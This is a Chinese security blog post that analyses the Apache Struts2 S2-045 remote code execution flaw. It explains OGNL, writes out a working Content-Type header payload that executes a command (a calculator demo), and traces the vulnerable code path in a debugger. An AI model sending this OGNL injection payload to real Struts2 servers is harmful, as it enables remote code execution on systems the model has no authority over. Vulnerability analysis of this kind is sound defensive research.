<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="2018-09-08 首发于阿里先知: https://xz.aliyun.com/t/2712 0x00 OGNL表达式1) ognl基本介绍OGNL是Object-Graph Navigation Language（对象图导航语言）的缩写，它是一种功能强大的表达式语言(比EL更强大)，通过简单一致的表达式语法，可以存取对象的任何属性，调用对象的方法，遍历整个对象的结构图，实现字段类型转化等功能">
<meta property="og:type" content="article">
<meta property="og:title" content="【Struts2-命令-代码执行漏洞分析系列】S2-045">
<meta property="og:url" content="http://yoursite.com/2018/09/08/【Struts2-命令-代码执行漏洞分析系列】S2-045/index.html">
<meta property="og:site_name" content="pplsec">
<meta property="og:description" content="2018-09-08 首发于阿里先知: https://xz.aliyun.com/t/2712 0x00 OGNL表达式1) ognl基本介绍OGNL是Object-Graph Navigation Language（对象图导航语言）的缩写，它是一种功能强大的表达式语言(比EL更强大)，通过简单一致的表达式语法，可以存取对象的任何属性，调用对象的方法，遍历整个对象的结构图，实现字段类型转化等功能">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122928-c662d6fc-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c67cc9cc-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c68caba8-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c6a78ad6-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c6ba53b4-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c6d47352-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c6e3210e-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c6f536be-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c7053b04-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c71ee0d6-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c73e41e2-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c74ea9c4-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c76c9560-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c77f3e04-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c78d3798-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c79df998-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c7aa855a-b31f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122931-c7bf49f4-b31f-1.png">
<meta property="og:updated_time" content="2018-09-08T01:38:36.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【Struts2-命令-代码执行漏洞分析系列】S2-045">
<meta name="twitter:description" content="2018-09-08 首发于阿里先知: https://xz.aliyun.com/t/2712 0x00 OGNL表达式1) ognl基本介绍OGNL是Object-Graph Navigation Language（对象图导航语言）的缩写，它是一种功能强大的表达式语言(比EL更强大)，通过简单一致的表达式语法，可以存取对象的任何属性，调用对象的方法，遍历整个对象的结构图，实现字段类型转化等功能">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20180908122928-c662d6fc-b31f-1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/09/08/【Struts2-命令-代码执行漏洞分析系列】S2-045/">





  <title>【Struts2-命令-代码执行漏洞分析系列】S2-045 | pplsec</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">pplsec</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">爱安全 爱生活</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/09/08/【Struts2-命令-代码执行漏洞分析系列】S2-045/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="pplsec">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/ppl.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="pplsec">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">【Struts2-命令-代码执行漏洞分析系列】S2-045</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-09-08T09:38:36+08:00">
                2018-09-08
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/漏洞分析/" itemprop="url" rel="index">
                    <span itemprop="name">漏洞分析</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>2018-09-08 首发于阿里先知: <a href="https://xz.aliyun.com/t/2712" target="_blank" rel="noopener">https://xz.aliyun.com/t/2712</a></p>
<h3 id="0x00-OGNL表达式"><a href="#0x00-OGNL表达式" class="headerlink" title="0x00 OGNL表达式"></a>0x00 OGNL表达式</h3><h4 id="1-ognl基本介绍"><a href="#1-ognl基本介绍" class="headerlink" title="1) ognl基本介绍"></a>1) ognl基本介绍</h4><p>OGNL是Object-Graph Navigation Language（对象图导航语言）的缩写，它是一种功能强大的表达式语言(比EL更强大)，通过简单一致的表达式语法，可以存取对象的任何属性，调用对象的方法，遍历整个对象的结构图，实现字段类型转化等功能。<br>xwork提供了OGNL表达式。其jar包为ognl-x.x.x.jar。<br>Struts2框架使用OGNL作为默认的表达式语言。<br>OGNL有三大要素，分别是表达式、根对象、Context对象。<br>表达式是整个OGNL的核心，OGNL根据表达式去对象中取值。所有OGNL操作都是针对表达式解析后进行的。<br>根对象（Root）:Root对象可以理解为OGNL的操作对象，表达式规定了”做什么”，而Root对象则规定了”对谁操作”。OGNL称为对象图导航语言，所谓对象图，即以任意一个对象为根，通过OGNL可以访问与这个对象关联的其它对象。<br>Context对象:OGNL的取值还需要一个上下文环境。Root对象所在环境就是OGNL的上下文环境(Context)。上下文环境规定了OGNL的操作在哪里进行。上下文环境Context是一个Map类型的对象，在表达式中访问Context中的对象，需要使用”#”号加上对象名称，即#”对象名称”的形式，表示了与访问Root对象的区别。</p>
<h4 id="2-ognl基本用法示例"><a href="#2-ognl基本用法示例" class="headerlink" title="2)ognl基本用法示例"></a>2)ognl基本用法示例</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">package lltest;</span><br><span class="line"></span><br><span class="line">import ognl.Ognl;</span><br><span class="line">import ognl.OgnlContext;</span><br><span class="line">import ognl.OgnlException;</span><br><span class="line"></span><br><span class="line">public class ognltest1 &#123;</span><br><span class="line">	 public static void main(String[] args) throws OgnlException &#123;</span><br><span class="line">     //创建一个Ognl上下文对象</span><br><span class="line">     OgnlContext context = new OgnlContext();</span><br><span class="line"></span><br><span class="line">	 // 调用对象的方法 </span><br><span class="line">    Object obj1 = Ognl.getValue(&quot;&apos;helloworld123&apos;.length()&quot;, context, context.getRoot());</span><br><span class="line">    System.out.println(obj1);</span><br><span class="line"></span><br><span class="line">    // 获取OGNL上下文的对象</span><br><span class="line">    context.put(&quot;name&quot;, &quot;lltest&quot;);</span><br><span class="line">    Object obj2 = Ognl.getValue(&quot;#name&quot;, context, context.getRoot());</span><br><span class="line">    System.out.println(obj2);</span><br><span class="line"></span><br><span class="line">    //调用类静态方法</span><br><span class="line">    //@[类全名(包括包路径)]@[方法名|值名]</span><br><span class="line">    Object obj3 = Ognl.getValue(&quot;@java.lang.String@format(&apos;hello %s&apos;, &apos;lltest&apos;)&quot;, context);</span><br><span class="line">    System.out.println(obj3);</span><br><span class="line">	 &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>说明：需要导入ognl-3.0.6.jar<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122928-c662d6fc-b31f-1.png" alt=""></p>
<h4 id="3-ognl执行系统命令"><a href="#3-ognl执行系统命令" class="headerlink" title="3) ognl执行系统命令"></a>3) ognl执行系统命令</h4><p>用法： @[类全名(包括包路径)]@[方法名|值名]   即@包名.类名@方法名   如:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Object obj = Ognl.getValue(&quot;@java.lang.Runtime@getRuntime().exec(&apos;calc&apos;)&quot;, context);</span><br></pre></td></tr></table></figure></p>
<p>完整示例:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">package lltest;</span><br><span class="line"></span><br><span class="line">import ognl.Ognl;</span><br><span class="line">import ognl.OgnlContext;</span><br><span class="line">import ognl.OgnlException;</span><br><span class="line"></span><br><span class="line">public class OsExec &#123;</span><br><span class="line">	 public static void main(String[] args) throws OgnlException &#123;</span><br><span class="line">		 OgnlContext context = new OgnlContext();</span><br><span class="line">		//@[类全名(包括包路径)@[方法名|值名]]</span><br><span class="line">		 //执行命令</span><br><span class="line">		 Object obj = Ognl.getValue(&quot;@java.lang.Runtime@getRuntime().exec(&apos;calc&apos;)&quot;, context);</span><br><span class="line">		 System.out.println(obj);</span><br><span class="line">	 &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>说明：需要导入javassist-3.11.0.GA.jar和ognl-3.0.6.jar 两个jar包</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c67cc9cc-b31f-1.png" alt=""></p>
<h3 id="0x01-S2-045漏洞简述"><a href="#0x01-S2-045漏洞简述" class="headerlink" title="0x01 S2-045漏洞简述"></a>0x01 S2-045漏洞简述</h3><p>Struts2默认处理multipart上传报文的解析器为Jakarta插件（org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest类）。<br>但是Jakarta插件在处理文件上传(multipart)的请求时会捉捕异常信息，并对异常信息进行OGNL表达式处理。当content-type错误时会抛出异常并带上Content-Type属性值，可通过构造附带OGNL表达的请求导致远程代码执行。<br>影响Struts2版本： Struts 2.3.5 – Struts 2.3.31, Struts 2.5 – Struts 2.5.10<br>官方通告详情：<br><a href="https://cwiki.apache.org/confluence/display/WW/S2-045" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-045</a><br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c68caba8-b31f-1.png" alt=""></p>
<h3 id="0x02-S2-045漏洞分析"><a href="#0x02-S2-045漏洞分析" class="headerlink" title="0x02 S2-045漏洞分析"></a>0x02 S2-045漏洞分析</h3><p>为复现漏洞，可使用struts2.3.x环境下自带的struts2-showcase演示demo示例环境，进行漏洞复现。下载struts-2.3.20-apps.zip  (<a href="http://archive.apache.org/dist/struts/2.3.20/" target="_blank" rel="noopener">http://archive.apache.org/dist/struts/2.3.20/</a> )<br>或者自行编写简单测试样例，不去详述了。<br>下面使用eclipse对struts-2.3.20进行动态分析：</p>
<h4 id="1-漏洞补丁对比"><a href="#1-漏洞补丁对比" class="headerlink" title="1) 漏洞补丁对比"></a>1) 漏洞补丁对比</h4><p><a href="https://github.com/apache/struts/commit/352306493971e7d5a756d61780d57a76eb1f519a?diff=split" target="_blank" rel="noopener">https://github.com/apache/struts/commit/352306493971e7d5a756d61780d57a76eb1f519a?diff=split</a><br>主要对core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java中的<br>return LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, e.getMessage(), args);  进行删除，并重新定义<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c6a78ad6-b31f-1.png" alt=""></p>
<h4 id="2-Jakarta解析multipart上传请求"><a href="#2-Jakarta解析multipart上传请求" class="headerlink" title="2)Jakarta解析multipart上传请求"></a>2)Jakarta解析multipart上传请求</h4><p>Struts2默认处理multipart上传报文的解析器是plugin插件（org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest类）<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c6ba53b4-b31f-1.png" alt=""></p>
<p>StrutsPrepareAndExecuteFilter类是Struts2默认配置的入口过滤器。Struts2首先对输入请求对象request的进行封装：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">request = prepare.wrapRequest(request);</span><br></pre></td></tr></table></figure></p>
<p>路径struts-2.3.20\src\core\src\main\java\org\apache\struts2\dispatcher\ng\filter\StrutsPrepareAndExecuteFilter.java<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c6d47352-b31f-1.png" alt=""><br>跟进wrapRequest()<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c6e3210e-b31f-1.png" alt=""><br>继续跟进wrapRequest()<br>路径struts-2.3.20\src\core\src\main\java\org\apache\struts2\dispatcher\Dispatcher.java<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c6f536be-b31f-1.png" alt=""></p>
<p>此处有两个关注点：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1）if (content_type != null &amp;&amp; content_type.contains(&quot;multipart/form-data&quot;)) &#123;</span><br></pre></td></tr></table></figure></p>
<p>S2-045的POC一般都有(#nike=’multipart/form-data’)这样一句，就是使content_type.contains(“multipart/form-data”)判断为true<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">2）MultiPartRequest mpr = getMultiPartRequest();</span><br></pre></td></tr></table></figure></p>
<p>继续追踪getMultiPartRequest方法。通过配置struts.multipart.parser属性，可以指定不同的解析类，而默认就是org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest类。</p>
<h4 id="3-加断点动态测试"><a href="#3-加断点动态测试" class="headerlink" title="3) 加断点动态测试"></a>3) 加断点动态测试</h4><p>弹出计算器POC：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Type: haha~multipart/form-data %&#123;#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(&apos;calc&apos;)&#125;;</span><br></pre></td></tr></table></figure></p>
<h5 id="JakartaMultiPartRequest-java-buildErrorMessage"><a href="#JakartaMultiPartRequest-java-buildErrorMessage" class="headerlink" title="JakartaMultiPartRequest.java - buildErrorMessage()"></a>JakartaMultiPartRequest.java - buildErrorMessage()</h5><p>路径struts-2.3.20\src\core\src\main\java\org\apache\struts2\dispatcher\multipart<br>在return LocalizedTextUtil.findText()处加断点<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">protected String buildErrorMessage(Throwable e, Object[] args) &#123;</span><br><span class="line">      String errorKey = &quot;struts.messages.upload.error.&quot; + e.getClass().getSimpleName();</span><br><span class="line">      if (LOG.isDebugEnabled()) &#123;</span><br><span class="line">          LOG.debug(&quot;Preparing error message for key: [#0]&quot;, errorKey);</span><br><span class="line">      &#125;</span><br><span class="line">      return LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, e.getMessage(), args); //加断点</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122929-c7053b04-b31f-1.png" alt=""><br>到达断点return LocalizedTextUtil.findText()，执行下一步，即可弹出计算器：<br>此时e的值为:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn&apos;t contain a multipart/form-data or multipart/mixed stream, content type header is haha~multipart/form-data %&#123;#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(&apos;calc&apos;)&#125;;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c71ee0d6-b31f-1.png" alt=""><br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c73e41e2-b31f-1.png" alt=""></p>
<p>下面到达断点return LocalizedTextUtil.findText() 然后跟进findText()方法继续调试</p>
<h5 id="LocalizedTextUtil-java"><a href="#LocalizedTextUtil-java" class="headerlink" title="LocalizedTextUtil.java"></a>LocalizedTextUtil.java</h5><p>路径struts-2.3.20\src\xwork-core\src\main\java\com\opensymphony\xwork2\util\ LocalizedTextUtil.java</p>
<h6 id="findText"><a href="#findText" class="headerlink" title="findText()"></a>findText()</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">return LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, e.getMessage(), args);</span><br></pre></td></tr></table></figure>
<p>跟进LocalizedTextUtil.findText()<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c74ea9c4-b31f-1.png" alt=""><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">return findText(aClass, aTextName, locale, defaultMessage, args, valueStack);</span><br></pre></td></tr></table></figure></p>
<p>继续跟进return findText()</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">此时indexedTextName为：null</span><br><span class="line">defaultMessage为：</span><br><span class="line">the request doesn&apos;t contain a multipart/form-data or multipart/mixed stream, content type header is haha~multipart/form-data %&#123;#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(&apos;calc&apos;)&#125;;</span><br></pre></td></tr></table></figure>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c76c9560-b31f-1.png" alt=""></p>
<h6 id="getDefaultMessage"><a href="#getDefaultMessage" class="headerlink" title="getDefaultMessage()"></a>getDefaultMessage()</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">result = getDefaultMessage(aTextName, locale, valueStack, args, defaultMessage);</span><br></pre></td></tr></table></figure>
<p>继续跟进getDefaultMessage()<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c77f3e04-b31f-1.png" alt=""></p>
<h5 id="TextParseUtil-java-translateVariables"><a href="#TextParseUtil-java-translateVariables" class="headerlink" title="TextParseUtil.java - translateVariables()"></a>TextParseUtil.java - translateVariables()</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MessageFormat mf = buildMessageFormat(TextParseUtil.translateVariables(message, valueStack), locale);</span><br></pre></td></tr></table></figure>
<p> 继续跟进 translateVariables()<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c78d3798-b31f-1.png" alt=""></p>
<p>translateVariables()方法使用了 ognl 的 $ 与 % 标签，两者都能告诉执行环境 ${} 或 %{} 中的内容为ognl表达式。所以POC中使用 % 或者$ 都可以触发漏洞。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">return parser.evaluate(openChars, expression, ognlEval, maxLoopCount);</span><br></pre></td></tr></table></figure>
<p>继续跟进return translateVariables()<br>最后调用了evaluate()方法解析OGNL，执行代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">此时expression值为the request doesn&apos;t contain a multipart/form-data or multipart/mixed stream, content type header is haha~multipart/form-data %&#123;#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(&apos;calc&apos;)&#125;;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c79df998-b31f-1.png" alt=""></p>
<h5 id="evaluate-方法说明"><a href="#evaluate-方法说明" class="headerlink" title="evaluate()方法说明"></a>evaluate()方法说明</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ParsedValueEvaluator ognlEval = new ParsedValueEvaluator() &#123;</span><br></pre></td></tr></table></figure>
<p>跟进ParsedValueEvaluator()<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122930-c7aa855a-b31f-1.png" alt=""><br>translateVariables()方法继承接口com.opensymphony.xwork2.util.TextParseUtil.ParsedValueEvaluator<br>在创建对象后重写了evaluate()方法<br>通过该方法的说明文档可知evaluate()方法会解析ognl表达式<br><a href="https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/util/TextParseUtil.ParsedValueEvaluator.html" target="_blank" rel="noopener">https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/util/TextParseUtil.ParsedValueEvaluator.html</a><br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180908122931-c7bf49f4-b31f-1.png" alt=""></p>
<h3 id="参考"><a href="#参考" class="headerlink" title="参考:"></a>参考:</h3><p><a href="https://paper.seebug.org/241/" target="_blank" rel="noopener">https://paper.seebug.org/241/</a><br><a href="https://paper.seebug.org/247/" target="_blank" rel="noopener">https://paper.seebug.org/247/</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/06/后渗透之meterpreter使用攻略/" rel="next" title="后渗透之meterpreter使用攻略">
                <i class="fa fa-chevron-left"></i> 后渗透之meterpreter使用攻略
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/09/19/JAVA代码审计之XXE与SSRF/" rel="prev" title="JAVA代码审计之XXE与SSRF">
                JAVA代码审计之XXE与SSRF <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/ppl.jpg" alt="pplsec">
            
              <p class="site-author-name" itemprop="name">pplsec</p>
              <p class="site-description motion-element" itemprop="description">渗透测试 应急响应 代码审计</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
